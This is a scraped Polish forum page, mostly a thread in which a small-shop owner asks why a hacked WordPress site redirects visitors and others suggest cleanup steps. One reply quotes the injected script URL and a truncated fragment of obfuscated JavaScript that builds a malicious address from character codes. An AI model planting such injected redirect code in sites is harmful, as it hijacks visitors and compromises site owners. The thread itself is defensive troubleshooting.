Aktywne Wpisy
Wilk__95 +47
Do wszystkich osób publikujących treści pod tagiem #sebcel na Wykop.pl
Granica została przekroczona. To, co od dłuższego czasu pojawia się pod tym tagiem, nie jest krytyką, tylko zorganizowanym hejtem, który narusza moje dobra osobiste i wizerunek. Każda kolejna próba ośmieszania, zniesławienia czy ataku będzie traktowana jako dowód w sprawie.
Nie interesują mnie anonimowe docinki, bo „anonimowość” w internecie kończy się w momencie, gdy sprawą zajmuje się sąd. Wbrew temu, co niektórzy sądzą,
Granica została przekroczona. To, co od dłuższego czasu pojawia się pod tym tagiem, nie jest krytyką, tylko zorganizowanym hejtem, który narusza moje dobra osobiste i wizerunek. Każda kolejna próba ośmieszania, zniesławienia czy ataku będzie traktowana jako dowód w sprawie.
Nie interesują mnie anonimowe docinki, bo „anonimowość” w internecie kończy się w momencie, gdy sprawą zajmuje się sąd. Wbrew temu, co niektórzy sądzą,

źródło: Zdjęcie z biblioteki
Pobierz

#programowanie #sieci #hacking #wordpress
Mam sobie mały sklep internetowy i codziennie coś tam na nim sobie robie, to nowe produkty to coś innego.
Swierdziłem ze chce SSL, i kupiłem. To było 2 tygodnie temu i wszystko kryształ, działa.
Dizisja wchodze i strona jest przekierowywana na jakiś szit, sprawdzałem już wszystkie htaacces, nigdzie nie widać śladu przekierowania, sprawdzałem wszystkie wp-header'y, index.php i nigdzie nie widze czegoś co może być w jakimkolwiek stopniu powiązane z tymi przekierowywaniami.
Usunałem przez FTP wszystkie pluginy, lecz też bez zmian.
Domene mam na ovh - jeszcze mi nie odpisali
Hosting mam na linuxpl.com - odpisali, wrzucili mi backup. Ale bez zmian.
Nie wiem czy mam sie poddać czy co robić z tym już.
Strona: www.kajet.art
Obstawiam obfuskowany eval i inne świństwa gdzieś w plikach lub JS.
Po 1. zmień hasła bo jak się w-----i raz, to wjebią się kolejny.
Po 2. od nowa
Komentarz usunięty przez autora
2. zaraz to zrobie
3.nie wiem jak to zrobić
4.Sprawdziłem już, czysto
5. htaccess - czyste wszystkie które sprawdzałem
6. bo była promocja ( ͡° ͜ʖ ͡°)
@371t3: Miałem go zainstalowanego, jego pierwszego wyrzuciłem, ale nic nie pomogło
grep -iR szukanadomenana swoim kodzie i zobaczcie co i gdzie wam dołączyło skrypty z tej domeny. Oczywiście nie dam głowy, że nie ma tego w treści jakiegoś komentarza czy innego contentu od strony użytkownika. Wtedy szukajcie w bazie.Sprawdź też footer.php to też lubią używać.
źródło: comment_NUiTUyIukqBqTRiRQA6ncZJlt5fmUKPR.jpg
Pobierzhttps://mytemplatewebsite.com/0.js?/wp-content/themes/Divi/style_css&ver=3.17.6
var lt = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 121, 116, 101, 109, 112, 108, 97, 116, 101, 119, 101, 98, 115, 105, 116, 101, 46, 99, 111, 109, 47, 102, 46, 112, 104,
Komentarz usunięty przez autora